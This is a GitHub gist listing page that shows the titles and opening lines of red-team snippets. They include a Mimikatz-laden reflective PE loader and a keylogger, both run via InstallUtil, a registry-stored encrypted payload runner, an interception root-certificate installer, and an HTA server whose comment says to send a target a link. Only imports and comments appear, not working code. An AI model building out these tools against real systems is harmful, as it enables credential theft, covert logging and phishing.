Skip to content

Instantly share code, notes, and snippets.

View nicholasmckinney's full-sized avatar

Nicholas McKinney nicholasmckinney

View GitHub Profile
@nicholasmckinney
nicholasmckinney / Utility.cs
Created May 8, 2017 00:27
InstallUtility Functions
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@nicholasmckinney
nicholasmckinney / InterceptorCertGen.ps1
Created May 8, 2017 00:27
Windows Nano Server - Certificate Generation and Installation
function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
$CAsubject = $certSubject
$dn = new-object -com "X509Enrollment.CX500DistinguishedName"
$dn.Encode( "CN=" + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
#Issuer Property for cleanup
$issuer = "__Interceptor_Trusted_Root"
$issuerdn = new-object -com "X509Enrollment.CX500DistinguishedName"
$issuerdn.Encode("CN=" + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
# Create a new Private Key
@nicholasmckinney
nicholasmckinney / list
Created May 8, 2017 00:27
Infosec Team - Book List
Infosec Team Book List
The Cuckoo's Egg - Cliff Stoll
Hacking, The Art of Exploitation - Jon Ericson
Art of Memory Forensics - by Michael Hale Ligh, Andrew Case, Jamie Levy, AAron Walters
Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground - Kevin Poulsen
Ghost in the Wires: My Adventures as the World's Most Wanted Hacker - Kevin Mitnick
Daemon - Daniel Suarez
@nicholasmckinney
nicholasmckinney / PELoader.cs
Created May 8, 2017 00:27
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@nicholasmckinney
nicholasmckinney / iukl.cs
Created May 8, 2017 00:27
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
@nicholasmckinney
nicholasmckinney / RSAGuts.ps1
Created May 8, 2017 00:27
RSA Algorithm in PowerShell. Just Cause
<#
Created By Casey Smith
@subTee
RSA in PowerShell.
Just Cause...
Reference notes for the curious
p = 61 <= first prime number (destroy this after computing e and d)
q = 53 <= second prime number (destroy this after computing e and d)
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
function Receive-Request {
param(
$Request
)
$output = ""
@nicholasmckinney
nicholasmckinney / web.config
Created May 8, 2017 00:27
Encrypt Random Shit with aspnet_regiis.exe
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" -->
<!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" -->
<!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx -->
<!-- Example by @subTee -->
<connectionStrings>
<add name="constr" connectionString="blah" />
</connectionStrings>
<system.web>
function Start-PACFileHosting()
{
# Example PAC File Hosting
# Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html
# example: http://localhost:8083/i.pac
# Be Certain Line 19 matches your Interceptor Config
Start-Job -ScriptBlock {
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8083/")
@nicholasmckinney
nicholasmckinney / RegRunner.cs
Created May 8, 2017 00:28
Executes Encrypted File From Registry
using System;
using System.IO;
using System.Text;
using Microsoft.Win32;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;